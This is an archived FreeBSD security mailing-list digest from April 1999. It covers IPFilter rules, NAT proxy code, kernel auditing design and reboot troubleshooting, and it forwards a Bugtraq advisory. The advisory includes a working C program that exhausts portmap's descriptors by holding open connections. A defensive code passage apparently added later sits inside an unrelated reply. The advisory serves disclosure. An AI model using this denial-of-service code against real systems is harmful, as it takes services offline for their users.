Change the rules to pass, and then block everything else. Obvious things you might miss. Dont firewall localhost. If you are blocking any to any at the end, make a rule for localhost. You must also have a rule to allow in established-connection packets. THat is, if you are allowing connections out, you'll need a rule that allows the remote host to reply. Ie: pass in quick proto tcp from any to any flags A/A (As far as I know, IPfilter maintains a table of outward going connections, and only allows in established-connection return packets for connections in the table. This stops anyone getting through by forging packets as return packets. (ACK or RST bits set on.) Can anyone confirm this is what IPfilter does? Or IPFW?) If you want to pass through 53, you will need a rule that will 'keep-state' on outgoing. Ie: pass out quick on ppp0 proto udp from any to any port = 53 keep state You'll ofcourse need an equivalent in rule. pass in quick proto tcp from any to port = 53 Not _exactly_ sure what keep-state does, but it is required for 53 because it stops packets from being adversely changed. (nameserver stuff needs 53 on both ends of the connection too.) When using the NAT part of IPfilter, the IPfilter rules are applied before NAT for incoming packets, and the opposite of outgoing packets. This makes sense, its silly to translate packets just for IPfilter to drop them. The IPfilter in 3.1-RELEASE has a bug (I think) in the logging, to do with NAT. When working out what is happening in the rules when using NAT, it will log dropped packets without taking NAT into account. (Even though it should, seeing as NAT is being applied to the packets.) I can provide more info for those who are curious. Just dont take the logs _too_ literally when dealing with NAT in the equasion. Passing ICMP and UDP is a good thing initially, atleast untill you get all your TCP rules sorted out. And dont make rules needlessly, especially for ethernet interfaces. 
If you don't trust your ethernets, (and you have a default route to a ppp0 or a separate interface to the net) apply the same rules for your internet interface to all interfaces by leaving out the 'on ' part of the rule. You want as few rules as possible of course, and if the machine routes for heavily-used ethernets, the machine should be kinda beefy.. I haven't used the in-kernel ftp proxy yet, so can't comment about problems with that. Apologies if I got any details wrong, I'm kinda starting out at this myself. Lemme know if I got any of that wrong. > > Thomas Uhrfelt > John Baldwin -- http://members.freedomnet.com/~jbaldwin/ -- Gavan McCormack - tetragon@cyber.com.au - tetragon@bitey.net Cybersource P/L. TCPIP network management & Unix system administration. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:30:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from fep04-svc.tin.it (mta04-acc.tin.it [212.216.176.35]) by hub.freebsd.org (Postfix) with ESMTP id 0B6F414E2D for ; Thu, 15 Apr 1999 12:30:49 -0700 (PDT) (envelope-from molter@tin.it) Received: from nympha.ecomotor.it ([212.216.29.181]) by fep04-svc.tin.it (InterMail v4.0 201-221-105) with SMTP id <19990415192826.EXBN9313.fep04-svc@nympha.ecomotor.it> for ; Thu, 15 Apr 1999 21:28:26 +0200 Received: (qmail 2062 invoked by uid 1000); 15 Apr 1999 18:40:33 -0000 From: "Marco Molteni" Date: Thu, 15 Apr 1999 20:40:33 +0200 (CEST) X-Sender: molter@localhost To: Joe Orthoefer Cc: freebsd-security@freebsd.org Subject: Re: KAME ipsec and cisco IOS In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Apr 1999, Joe Orthoefer wrote: > Is it currently possible to get a cisco with ipsec and a freebsd box > running the KAME stuff to pass encrypted traffic back and forth > (ipv4+ipsec)?
I realize the problem is principally the key management > between the two. Has anyone even attempted this? Is there a better place > to ask this question? Joe, try the mailing list snap-users@kame.net Marco --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:41:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.program-products.co.uk (unknown [212.240.242.226]) by hub.freebsd.org (Postfix) with ESMTP id B865A14DE0 for ; Thu, 15 Apr 1999 12:41:25 -0700 (PDT) (envelope-from terry@program-products.co.uk) Received: by mailgate.program-products.co.uk via smap (V2.1) id xma014024; Thu, 15 Apr 99 20:38:31 +0100 Distribution: local To: mm@i.cz, freebsd-security@freebsd.org Subject: Re: IPFilter? References: From: Terry Glanfield Date: 15 Apr 1999 20:38:28 +0100 In-Reply-To: mm@i.cz's message of "15 Apr 99 08:08:15 GMT" Message-Id: Lines: 51 X-Mailer: Gnus v5.6.44/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Martin, mm@i.cz (Martin Machacek) writes: > I've also had troubles using transparent proxying with IPFilter 3.2.10 and FWTK > v 2 (with appropriate patches) on FreeBSD 2.2.8. In every case the ioctl on > /dev/ipl trying to read the original target address failed. Check your fwtk/lib/hnam.c. It may be out of date - mine was. The relevant code snippet is appended below. > The built in FTP proxy didn't work either except > for passive mode transfers (that was actually the reason why I was experimenting > with ftp-gw from FWTK). Why would you want anything *but* passive transfers? Regards, Terry.
#if defined(__FreeBSD__)
        /* The basis for this block of code is Darren Reed's patches to
         * the TIS ftwk's ftp-gw. */
        bzero((char *)&sin, sizeof(sin));
        bzero((char *)&rsin, sizeof(rsin));
        sl = sizeof(sin);       /* not in the posted snippet: getsockname() needs
                                 * sl initialised unless it is set earlier in hnam.c */
        if (getsockname(fd, (struct sockaddr *)&sin, &sl) < 0) {
                return NULL;
        }
        sl = sizeof(rsin);
        if (getpeername(fd, (struct sockaddr *)&rsin, &sl) < 0) {
                return NULL;
        }
        /* Ask the NAT table for the mapping that produced this local/remote pair. */
        natlookup.nl_inport = sin.sin_port;
        natlookup.nl_outport = rsin.sin_port;
        natlookup.nl_inip = sin.sin_addr;
        natlookup.nl_outip = rsin.sin_addr;
        natlookup.nl_flags = IPN_TCP;
        if ((natfd = open("/dev/ipnat", O_RDONLY)) < 0) {
                return(NULL);
        }
        if (ioctl(natfd, SIOCGNATL, &natlookup) == (-1)) {
                close(natfd);   /* do not leak the /dev/ipnat descriptor on failure */
                return(NULL);
        }
        close(natfd);
        /* nl_realip/nl_realport hold the original (pre-NAT) destination. */
        if (ptr)
                *ptr = ntohs(natlookup.nl_realport);
        sprintf(buf, "%s", inet_ntoa(natlookup.nl_realip));
        return (buf);
#endif
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 12:58: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id B812D14C35 for ; Thu, 15 Apr 1999 12:57:48 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id PAA06227 for freebsd-security@freebsd.org; Thu, 15 Apr 1999 15:55:26 -0400 (EDT) Date: Thu, 15 Apr 1999 15:55:24 -0400 (EDT) From: Daniel Hagan To: freebsd-security@freebsd.org Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ---------- Forwarded message ---------- Date: Wed, 14 Apr 1999 15:26:14 +0200 From: Lukasz Luzar To: BUGTRAQ@NETSPACE.ORG Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet, Poland http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Report title : Lack of RPC's implementation in libc libraries and how it affects for example portmap.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Report created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl)
Problem found at : 08 April 1999
Report published : 14 April 1999
Report code : KKIS.08041999.001.b
Short description : full description below
Vulnerable versions : libc*, up to current.
Platforms affected : Linux X.X, FreeBSD X.X, probably others...
Patches : currently not available
Archive : http://www.security.kki.pl/advisories/
Impact description : full description below
Risk level : medium
Notes : we were unable to contact the authors of libc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It seems that libc's RPC implementation checks neither the time of established connections nor the number of connected sockets. This is quite dangerous, because many network services are based on these functions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below is the program which shows how to DoS portmap (tcp). When the maximum limit of descriptors per process is not set (e.g. the default settings on FreeBSD), it can easily lead to heavy problems with the victim machine's stability. When the limit of open descriptors is reached, portmap begins to refuse all new connections.
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 */
#include <stdio.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ADDR "10.0.0.1"   /* victim's IP address in dot notation */
#define PORT 111          /* victim service to DoS, e.g. portmapper */

int main(void)
{
    int sockfd, n = 0;
    struct sockaddr_in victim_addr;

    bzero((char *) &victim_addr, sizeof(victim_addr));
    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    fprintf(stdout, "Opening new connections...\n");
    /* Keep opening TCP connections until either side runs out of
     * descriptors or the victim refuses the connection. */
    for (;;) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            fprintf(stderr, "socket error at %d\n", n);
            break;
        }
        if (connect(sockfd, (struct sockaddr *) &victim_addr, sizeof(victim_addr)) < 0) {
            fprintf(stderr, "connect error at %d\n", n);
            break;
        }
        n++;
    }
    fprintf(stdout, "Established %d connections and waiting...\n", n);
    /* Hold every connection open (sleep instead of spinning); the
     * victim's descriptors stay consumed until this process exits. */
    for (;;)
        pause();
    return 0;
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 13: 9:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6720C150CF for ; Thu, 15 Apr 1999 13:09:44 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id WAA05460; Thu, 15 Apr 1999 22:07:22 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id VAA01781; Thu, 15 Apr 1999 21:11:31 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-reply-to: Your message of "Mon, 12 Apr 1999 09:39:31 EDT."
Date: Thu, 15 Apr 1999 21:11:31 +0200 Message-ID: <1779.924203491@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I had suspected (and observed) as much. What is the rational behind >having the name lookup pull the pathname into the kernel as opposed to >using a copyin in the syscall and passing it in as an argument? >Presumably someone, somewhere has to allocate space on the stack, and if >it's done in the syscall function then more argument processing is done in >one place? This would make at least a bit more available to an auditing >layer in the syscall. I think it is an old thing, conserving kernel memory. Indeed it may not make sense today where the vfs-name-cache is so much more efficient. Changing it may be a PITA. >I'm not sure if you've had a chance to look at the POSIX.1e draft or my >man pages for it. The man pages are online on by POSIX.1e page as part of >the tarball containing the first pass. The API is completely documented, >but I still have to document the audit event types and what they expect to >be reported. Sorry, no, time is a scarce resource for me these days... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! 
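Going back to the KKI advisory forwarded a few messages up, which says libc's RPC code checks neither how long established connections have been open nor how many there are: the following is an added example, not the advisory's code and not libc's or portmap's, of an accept() loop that enforces both limits, a per-source-address connection cap and an idle timeout. MAX_CONNS, MAX_PER_PEER, IDLE_TIMEOUT and LISTEN_PORT are assumed values, and it listens on loopback rather than on portmap's port 111.

```c
/* Added example, not the advisory's code and not libc's RPC code: an accept()
 * loop with the two checks the advisory says the RPC layer lacks, a cap on
 * connections per source address and an idle timeout. Constants are assumed. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <sys/time.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define MAX_CONNS     64   /* hard cap on simultaneous clients */
#define MAX_PER_PEER   4   /* connections allowed per source address */
#define IDLE_TIMEOUT  30   /* seconds of silence before a connection is dropped */
#define LISTEN_PORT 11111  /* stand-in for portmap's 111 */

struct conn { int fd; uint32_t peer; time_t last_seen; };   /* fd == -1: free slot */
struct conn_table { struct conn c[MAX_CONNS]; };

void conn_table_init(struct conn_table *t)
{
    int i;
    for (i = 0; i < MAX_CONNS; i++) t->c[i].fd = -1;
}
/* Live connections currently held by one source address. */
int conn_count_peer(const struct conn_table *t, uint32_t peer)
{
    int i, n = 0;
    for (i = 0; i < MAX_CONNS; i++)
        if (t->c[i].fd >= 0 && t->c[i].peer == peer) n++;
    return n;
}
/* Admit fd from peer: returns its slot, or -1 when the per-peer or global cap
 * is hit. Never touches descriptors; the caller closes fd on -1. */
int conn_admit(struct conn_table *t, int fd, uint32_t peer, time_t now)
{
    int i;
    if (conn_count_peer(t, peer) >= MAX_PER_PEER) return -1;
    for (i = 0; i < MAX_CONNS; i++)
        if (t->c[i].fd < 0) {
            t->c[i].fd = fd; t->c[i].peer = peer; t->c[i].last_seen = now;
            return i;
        }
    return -1;
}
void conn_touch(struct conn_table *t, int slot, time_t now) { t->c[slot].last_seen = now; }
/* Close every connection silent for more than idle_secs; returns how many were dropped. */
int conn_expire(struct conn_table *t, time_t now, int idle_secs)
{
    int i, dropped = 0;
    for (i = 0; i < MAX_CONNS; i++)
        if (t->c[i].fd >= 0 && now - t->c[i].last_seen > idle_secs) {
            close(t->c[i].fd); t->c[i].fd = -1; dropped++;
        }
    return dropped;
}

int main(void)
{
    struct conn_table t; struct sockaddr_in sa;
    int lfd = socket(AF_INET, SOCK_STREAM, 0);

    conn_table_init(&t);
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(LISTEN_PORT);
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(lfd, 16) < 0) {
        perror("bind/listen"); return 1;
    }
    for (;;) {
        fd_set rfds;
        struct timeval tv = { 1, 0 };   /* wake once a second to run conn_expire() */
        int i, maxfd = lfd;
        char buf[256];
        FD_ZERO(&rfds);
        FD_SET(lfd, &rfds);
        for (i = 0; i < MAX_CONNS; i++)
            if (t.c[i].fd >= 0) {               /* assumes fds stay below FD_SETSIZE */
                FD_SET(t.c[i].fd, &rfds);
                if (t.c[i].fd > maxfd) maxfd = t.c[i].fd;
            }
        if (select(maxfd + 1, &rfds, NULL, NULL, &tv) < 0) continue;
        if (FD_ISSET(lfd, &rfds)) {
            struct sockaddr_in peer; socklen_t pl = sizeof peer;
            int fd = accept(lfd, (struct sockaddr *)&peer, &pl);
            if (fd >= 0 && conn_admit(&t, fd, peer.sin_addr.s_addr, time(NULL)) < 0) {
                fprintf(stderr, "refusing %s: cap reached\n", inet_ntoa(peer.sin_addr));
                close(fd);   /* the flooder's connect() completed, but it holds no slot */
            }
        }
        for (i = 0; i < MAX_CONNS; i++) {
            if (t.c[i].fd < 0 || !FD_ISSET(t.c[i].fd, &rfds)) continue;
            if (read(t.c[i].fd, buf, sizeof buf) <= 0) { close(t.c[i].fd); t.c[i].fd = -1; }
            else conn_touch(&t, i, time(NULL));
        }
        conn_expire(&t, time(NULL), IDLE_TIMEOUT);
    }
}
```

Run it and point the advisory's example.c at 127.0.0.1 port 11111: the first four connections from an address get slots, every further one is accepted by the kernel and closed again by the server, so the flooder burns through its own descriptors while the server holds at most MAX_PER_PEER of them per address, and anything it does hold is reaped after IDLE_TIMEOUT seconds of silence. The per-address cap only helps against a single source; against many sources it is the global MAX_CONNS cap and the timeout that matter, and a production service would pair them with a setrlimit(RLIMIT_NOFILE) ceiling, the per-process descriptor limit the advisory notes is not set by default on FreeBSD.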
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 23:50:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 814C615162 for ; Thu, 15 Apr 1999 23:50:50 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id QAA06234; Fri, 16 Apr 1999 16:48:26 +1000 Date: Fri, 16 Apr 1999 16:48:26 +1000 From: Bruce Evans Message-Id: <199904160648.QAA06234@godzilla.zeta.org.au> To: phk@critter.freebsd.dk, robert+freebsd@cyrus.watson.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>I had suspected (and observed) as much. What is the rational behind >>having the name lookup pull the pathname into the kernel as opposed to >>using a copyin in the syscall and passing it in as an argument? >>Presumably someone, somewhere has to allocate space on the stack, and if Space is allocated by zalloc(). Not long ago, space was allocated by malloc(). The kernel stack may be too small to hold a name of length MAXPATHLEN. >>it's done in the syscall function then more argument processing is done in >>one place? This would make at least a bit more available to an auditing >>layer in the syscall. > >I think it is an old thing, conserving kernel memory. Indeed it may >not make sense today where the vfs-name-cache is so much more efficient. >Changing it may be a PITA. I think it's just centralisation. The pathname is copied in in one place instead of in 100's of syscall functions. 
Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 8:47:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 61E5A1542F for ; Fri, 16 Apr 1999 08:47:10 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA17432; Fri, 16 Apr 1999 11:41:00 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 16 Apr 1999 11:41:00 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Bruce Evans Cc: phk@critter.freebsd.dk, freebsd-security@FreeBSD.ORG Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-Reply-To: <199904160648.QAA06234@godzilla.zeta.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Apr 1999, Bruce Evans wrote: > >>I had suspected (and observed) as much. What is the rational behind > >>having the name lookup pull the pathname into the kernel as opposed to > >>using a copyin in the syscall and passing it in as an argument? > >>Presumably someone, somewhere has to allocate space on the stack, and if > > Space is allocated by zalloc(). Not long ago, space was allocated by > malloc(). The kernel stack may be too small to hold a name of length > MAXPATHLEN. I had wondered about that. > >>it's done in the syscall function then more argument processing is done in > >>one place? This would make at least a bit more available to an auditing > >>layer in the syscall. > > > >I think it is an old thing, conserving kernel memory. Indeed it may > >not make sense today where the vfs-name-cache is so much more efficient. > >Changing it may be a PITA. 
> > I think it's just centralisation. The pathname is copied in in one place > instead of in 100's of syscall functions. So the problem now is that we need to do different things with these strings in different places for the purpose of context-sensitive auditing. What do you recommend as the best way to get that string back again from namei()? I assume that ktrace just relies on the sequential execution of the syscall and the ordering of the NAMEI entries in the ktrace is really just the order the namei()'s happen to take place in the source. For auditing, we require a well-defined and consistent order, even if sections of the source change order for some reason. Nate has suggested munging ktrace to do what we need; while this is entirely possible, I'd prefer a more deterministic way of specifying the order of the items getting audited for a syscall. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. 
http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 10:21:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id E5D4E15970 for ; Fri, 16 Apr 1999 10:21:50 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id DAA22310; Sat, 17 Apr 1999 03:19:26 +1000 Date: Sat, 17 Apr 1999 03:19:26 +1000 From: Bruce Evans Message-Id: <199904161719.DAA22310@godzilla.zeta.org.au> To: bde@zeta.org.au, robert+freebsd@cyrus.watson.org Subject: Re: POSIX.1E auditing support, an initial pass and some questions Cc: freebsd-security@FreeBSD.ORG, phk@critter.freebsd.dk Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> >I think it is an old thing, conserving kernel memory. Indeed it may >> >not make sense today where the vfs-name-cache is so much more efficient. >> >Changing it may be a PITA. >> >> I think it's just centralisation. The pathname is copied in in one place >> instead of in 100's of syscall functions. > >So the problem now is that we need to do different things with these >strings in different places for the purpose of context-sensitive auditing. >What do you recommend as the best way to get that string back again from >namei()? I assume that ktrace just relies on the sequential execution of >the syscall and the ordering of the NAMEI entries in the ktrace is really >just the order the namei()'s happen to take place in the source. For >auditing, we require a well-defined and consistent order, even if sections >of the source change order for some reason. I can't think of anything better than depending on the order.
This should work OK for most syscalls since most syscalls don't do much before calling namei(), and only call it once. For the others, if you log what they are doing before namei() then you may want to log the path before calling namei(). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 14:59:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from efex.light1.net (unknown [207.76.225.3]) by hub.freebsd.org (Postfix) with ESMTP id 2F3CC158DD; Fri, 16 Apr 1999 14:59:21 -0700 (PDT) (envelope-from root@efex.light1.net) Received: from localhost (root@localhost) by efex.light1.net (8.9.2/8.9.1) with ESMTP id RAA15043; Fri, 16 Apr 1999 17:57:12 -0400 (EDT) Date: Fri, 16 Apr 1999 17:57:03 -0400 (EDT) From: System Administrator To: net@freebsd.org, security@freebsd.org Subject: unexpected rebooting Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi... my box has been rebooting unexpectedly.. word around has been a new dos.. i have been told im out of mbuf clusters.. 
but im not really sure what to do around when the box reboots i get arplookup and llook errors root@efex:/var/log# zgrep arplookup messages* messages.1:Apr 16 14:30:03 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:05 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:06 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:11 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:12 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:22 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:23 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:24 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo messages.1:Apr 16 14:30:30 efex /kernel: arplookup 207.76.225.58 failed: could not allocate llinfo then the box reboots.. not really any more information to give.. but if there is something i can give please tell me any help will be appreciated. thanks Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 16 15:37:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from andyo.prime.net (P3M5.prime.net.ua [195.64.229.237]) by hub.freebsd.org (Postfix) with ESMTP id 6262D14C36 for ; Fri, 16 Apr 1999 15:36:57 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.8.7/8.8.7) with ESMTP id BAA00729 for ; Sat, 17 Apr 1999 01:35:42 +0300 (EET DST) (envelope-from andyo@prime.net.ua) Message-ID: <3717BB37.31BC2F40@prime.net.ua> Date: Sat, 17 Apr 1999 01:35:36 +0300 From: =?koi8-r?Q?=E1=CE=C4=D2=C5=CA=20=F7=2E=20=EF=CC=C5=CA=CE=C9=CB?= (Andy V. 
Oleynik) Reply-To: andyo@prime.net.ua Organization: =?koi8-r?Q?=ED=2D=E9=CE=C6=CF?= X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: "Hmm.." Subject: Hanging up with strange redirection Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm running FreeBSD 2.2.7-RELEASE. Tonight I was working on my backbone. After about 1.5 hours of work I discovered that I can't TCP to foreign nodes. I tried to ping my DNS & got a reply from one of the addresses assigned to the p2p link connecting my two private nodes. For example, if my DNS's IP is 195.64.225.1, then I was replied to from one of the p2p links having address 195.64.225.249. *pinging 195.64.225.1* I was replied to by 195.64.225.249. *Both are my internal addresses*. I came to the node & discovered my DNS/FW/DialUP server hanging. The logs kept no info about anything strange. Who has any ideas? -- Andy V.
Oleynik (When U aim for perfection, U discover it's a moving target Ã80) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 17 1:44:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id B5AF8151A4; Sat, 17 Apr 1999 01:44:29 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA17018; Sat, 17 Apr 1999 09:41:58 +0100 (BST) Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: "System Administrator" , , Subject: Re: unexpected rebooting Date: Wed, 21 Apr 1999 09:42:02 +0100 Message-ID: <01be8bd2$d3fcb6a0$380051c2@greg.qmpgmc.ac.uk> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike, I have had a similar thing, my server unexpectedly reboots, I run 3.1-Release but intend on going to 3.1-Stable. I was told that it may have something the do with an error in VM. I do not get any ARP errors! (Our problems may be unrelated) Greg -----Original Message----- From: System Administrator To: net@FreeBSD.ORG ; security@FreeBSD.ORG Date: 16 April 1999 22:58 Subject: unexpected rebooting >hi... >my box has been rebooting unexpectedly.. word around has been a new dos.. >i have been told im out of mbuf clusters.. 
